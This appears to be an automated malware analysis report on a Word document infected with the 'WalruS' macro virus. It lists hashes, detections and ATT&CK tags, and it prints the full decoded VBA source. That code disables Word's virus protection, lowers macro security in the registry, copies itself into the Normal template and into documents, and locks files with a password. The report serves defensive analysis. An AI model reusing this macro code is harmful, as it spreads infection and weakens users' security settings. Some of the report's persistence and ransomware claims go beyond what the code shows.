Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d7f1533dca1d9192…

MALICIOUS

Office (OLE)

Size: 27.0 KB
Created: 2000-11-11 17:28:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 25e751753dade0f4d8ee6cb7addd61cc
SHA-1: 2d33aca424c63bcfdee2d672ecb76ab2d693c375
SHA-256: d7f1533dca1d9192d44200821f8640a44efea756bca9adf09a666ebe480b3710
Risk Score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros that are identified as malicious by ClamAV. The macro code attempts to drop a file to 'C:\WalruS.drv' and modify the registry to establish persistence and potentially disguise the infection. The macro also attempts to protect the document and display a large 'The WalruS' text, indicating a lure or a form of ransomware.

Heuristics (2)

  • ClamAV: Win.Trojan.Psycho-3 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1902 bytes
SHA-256: 69e3c9f0b7cb7d7468255651a7087db6e3b7b6bc131b0677064bedf28755637e
Detection
ClamAV: Doc.Trojan.Fool-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function GetTickCount Lib "Kernel32" () As Long
Private Sub Document_Close()
' WalruS Virus 11/00
    On Error Resume Next
    If Left(ActiveDocument.Name, 8) = "Document" Then Exit Sub
    DropPath = ("C:\WalruS.drv")
    RunTime = Format(GetTickCount / 60000, "0")
    VBProject.VBComponents(1).Export DropPath
    Set nt = NormalTemplate.VBProject.VBComponents(1).CodeModule: Set ad = ActiveDocument.VBProject.VBComponents(1).CodeModule
    Options.VirusProtection = False: Options.SaveNormalPrompt = False: Application.DisplayStatusBar = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "WalruS"
    If nt.CountOfLines = 0 Then
        nt.AddFromFile DropPath: nt.DeleteLines 1, 4: nt.replaceline 30, " Sub ToolsMacro(): End Sub"
    End If
    If ad.CountOfLines = 0 Then
        ad.AddFromFile DropPath: ad.DeleteLines 1, 4: ad.replaceline 30, " Sub ViewVBCode(): End Sub"
        ActiveDocument.Save
    End If
    If RunTime > 300 Then
        Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
        ActiveDocument.Shapes.AddTextEffect(msoTextEffect29, "The WalruS", _
            "Arial Black", 72#, msoFalse, msoFalse, 73.75, 129.3).Select
        ActiveDocument.Protect Password:=Application.UserName, NoReset:=False, Type:= _
            wdAllowOnlyComments
        ActiveDocument.Save
    End If
    Kill DropPath
End Sub
 Sub ViewVBCode(): End Sub